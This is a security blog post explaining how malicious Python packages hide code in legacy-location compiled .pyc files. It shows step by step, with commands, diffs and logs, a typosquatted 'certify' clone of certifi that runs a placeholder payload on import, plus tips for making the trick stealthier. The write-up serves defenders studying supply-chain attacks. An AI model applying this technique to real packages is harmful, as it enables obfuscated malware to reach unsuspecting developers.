Compiled Python Files

A mirror reflects an image that looks correct but obscures the real scene behind it
Photo by Rishabh Dharmani / Unsplash
🗣️
This is part of a series of posts examining the methods malicious Python code gains execution.

This technique is more about obfuscating malicious Python code but it still demonstrates a method for that malicious code to gain execution in a non-standard way. Compiled Python modules (*.pyc files) can be imported just like plain text modules but they are harder to analyze since they require decompilation to discern their true intent.

--cta--

PEP 3147 describes how compiled Python modules are created, stored, and used. It provides this hint as to how they can be leveraged for malicious purposes:

For backward compatibility, Python will still support pyc-only distributions, however it will only do so when the pyc file lives in the directory where the py file would have been, i.e. not in the __pycache__ directory. [A] pyc file outside of __pycache__ will only be imported if the py source file is missing.

This legacy support path, highlighted below in the flowchart provided by PEP 3147, can be used to create packages with obfuscated intent.

Flow chart descibing how Python modules are loaded, with highlighted legacy support path
Highlighted legacy compiled Python module import support path

The basic process can be illustrated by starting with the same spoofed certify package from an earlier entry in this blog series. Start by creating the malware in a plaintext Python module:

❯ cat certifi/sneaky.py
# The content in this module will only be
# provided in compiled form (*.pyc file).
print("[!] Malware could have run here")

Create a plaintext "malicious" Python payload

Then, ensure the module is called. In this case, we add a standard import statement in the core module, which should execute for all uses of this package.

❯ git diff certifi/core.py
diff --git a/certifi/core.py b/certifi/core.py
index 91f538b..ae4d699 100644
--- a/certifi/core.py
+++ b/certifi/core.py
@@ -6,6 +6,7 @@ This module returns the installation location of cacert.pem or its contents.
 """
 import sys
 import atexit
+from . import sneaky

 def exit_cacert_ctx() -> None:
     _CACERT_CTX.__exit__(None, None, None)  # type: ignore[union-attr]

Importing the "malicious" module will cause it's payload to run

Next, compile the source module and remove the original:

## The `-b` option will "use legacy (pre-PEP3147) compiled file locations"
❯ python -m compileall -b certifi/sneaky.py
Compiling 'certifi/sneaky.py'...

## Ensure the matching source module is removed
❯ rm certifi/sneaky.py

## See that the sneaky module only exists in compiled form
❯ ls -alh certifi
total 616
drwxr-xr-x  10 maxrake  staff   320B Apr 16 11:36 .
drwxr-xr-x  16 maxrake  staff   512B Apr 16 11:32 ..
-rw-r--r--   1 maxrake  staff    94B Apr 10 18:07 __init__.py
-rw-r--r--   1 maxrake  staff   243B Apr  9 10:20 __main__.py
-rw-r--r--   1 maxrake  staff   286K Apr  9 10:20 cacert.pem
-rw-r--r--   1 maxrake  staff   4.3K Apr 16 09:37 core.py
-rw-r--r--   1 maxrake  staff     0B Apr  9 10:20 py.typed
-rw-r--r--   1 maxrake  staff   178B Apr 16 11:36 sneaky.pyc
drwxr-xr-x   4 maxrake  staff   128B Apr  9 10:20 tests

Use the compileall standard library module to create the .pyc file

Finally, update the package_data entry in setup.py to ensure *.pyc files are included in the distribution:

❯ git diff setup.py
diff --git a/setup.py b/setup.py
index 4313c16..3477e9f 100755
--- a/setup.py
+++ b/setup.py
@@ -24,7 +24,7 @@ with open("certifi/__init__.py") as f:
         raise RuntimeError("No version number found!")

 setup(
-    name="certifi",
+    name="certify",
     version=VERSION,
     description="Python package for providing Mozilla's CA Bundle.",
     long_description=open("README.rst").read(),
@@ -35,7 +35,7 @@ setup(
         "certifi",
     ],
     package_dir={"certifi": "certifi"},
-    package_data={"certifi": ["*.pem", "py.typed"]},
+    package_data={"certifi": ["*.pem", "py.typed", "*.pyc"]},
     # data_files=[('certifi', ['certifi/cacert.pem'])],
     include_package_data=True,
     zip_safe=False,

Inclusion of *.pyc files in packages could be viewed as suspicious

The source distribution will now contain sneaky.pyc, whose obfuscated malicious contents are executed when the certifi package is used:

## Build the source distribution
❯ python setup.py sdist
/Users/maxrake/dev/phylum/python-certify/.venv/lib/python3.12/site-packages/setuptools/dist.py:318: InformationOnly: Normalizing '2024.02.02' to '2024.2.2'
  self.metadata.version = self._normalize_version(self.metadata.version)
running sdist
running egg_info
writing certify.egg-info/PKG-INFO
writing dependency_links to certify.egg-info/dependency_links.txt
writing top-level names to certify.egg-info/top_level.txt
reading manifest file 'certify.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no previously-included files found matching '.github/'
warning: manifest_maker: MANIFEST.in, line 4: 'recursive-exclude' expects <dir> <pattern1> <pattern2> ...
adding license file 'LICENSE'
writing manifest file 'certify.egg-info/SOURCES.txt'
running check
creating certify-2024.2.2
creating certify-2024.2.2/certifi
creating certify-2024.2.2/certify.egg-info
copying files to certify-2024.2.2...
copying LICENSE -> certify-2024.2.2
copying MANIFEST.in -> certify-2024.2.2
copying README.rst -> certify-2024.2.2
copying setup.py -> certify-2024.2.2
copying certifi/__init__.py -> certify-2024.2.2/certifi
copying certifi/__main__.py -> certify-2024.2.2/certifi
copying certifi/cacert.pem -> certify-2024.2.2/certifi
copying certifi/core.py -> certify-2024.2.2/certifi
copying certifi/py.typed -> certify-2024.2.2/certifi
copying certifi/sneaky.pyc -> certify-2024.2.2/certifi
copying certify.egg-info/PKG-INFO -> certify-2024.2.2/certify.egg-info
copying certify.egg-info/SOURCES.txt -> certify-2024.2.2/certify.egg-info
copying certify.egg-info/dependency_links.txt -> certify-2024.2.2/certify.egg-info
copying certify.egg-info/not-zip-safe -> certify-2024.2.2/certify.egg-info
copying certify.egg-info/top_level.txt -> certify-2024.2.2/certify.egg-info
copying certify.egg-info/SOURCES.txt -> certify-2024.2.2/certify.egg-info
Writing certify-2024.2.2/setup.cfg
Creating tar archive
removing 'certify-2024.2.2' (and everything under it)

## Install the source distribution
❯ python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Installing backend dependencies ... done
  Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
  Building wheel for certify (pyproject.toml) ... done
  Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164098 sha256=51b017049c2c11931217a2449845361a1f6c60c829edd002465ad22a1e071d4a
  Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/43/8d/c9/91f4cd154b7df7fbc77d07b6d2012a4f0b9a289da49d46706d
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2

## See that the "malicious code" runs upon importing the package
❯ python
Python 3.12.2 (main, Feb 14 2024, 10:56:22) [Clang 15.0.0 (clang-1500.1.0.2.5)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import certifi
[!] Malware could have run here
>>>

The malicious payload does not run on package installation but does on import

This technique is limited in that *.pyc files are specific to the Python version for which they were compiled. For instance, the source distribution created in the example above was done so with CPython 3.12 and will fail when used in an environment with a different version:

## Create a Python 3.11 virtual environment
❯ python3.11 -m venv py311_venv

## Show that commands executed from it use Python v3.11.9
❯ py311_venv/bin/python --version
Python 3.11.9

## Install the source distribution package in the environment
❯ py311_venv/bin/python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Installing backend dependencies ... done
  Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
  Building wheel for certify (pyproject.toml) ... done
  Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164098 sha256=5883a681d7835688093fb00f576b72f3af3e1b434de71cef41d144c2fc8e4f5f
  Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/48/f3/55/0b5be9a360ee3586f81a14846268ba7b47db0e122e702650c6
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2

## See that attempting to use the import package fails
❯ py311_venv/bin/python
Python 3.11.9 (main, Apr  8 2024, 08:53:08) [Clang 15.0.0 (clang-1500.3.9.4)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import certifi
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/Users/maxrake/dev/phylum/python-certify/certifi/__init__.py", line 1, in <module>
    from .core import contents, where
  File "/Users/maxrake/dev/phylum/python-certify/certifi/core.py", line 9, in <module>
    from . import sneaky
ImportError: bad magic number in 'certifi.sneaky': b'\xcb\r\r\n'
>>>

Compiled Python modules can only run on matching interpreter versions

The solution is to create multiple built distributions, one for each of the targeted Python versions, with matching compiled modules. Instead of a single certify-2024.2.2.tar.gz source distribution, certify-2024.2.2-cp312-none-any.whl and certify-2024.2.2-cp311-none-any.whl wheels would be created for CPython 3.12 and CPython 3.11, respectively. The code for doing so is left as an exercise for the reader.

This technique can be made even more stealthy by using importlib from the standard library to dynamically load the compiled module instead of using a standard import statement. Previous reporting exists to show one such method used by the malicious package fshec2.

Charles Coggins

Charles Coggins

Senior Software Engineer, responsible for integrations and author of the "phylum" Python package. Documentation and quality champion, runner, baseball and scout dad, pod-faster, and lover of outdoors.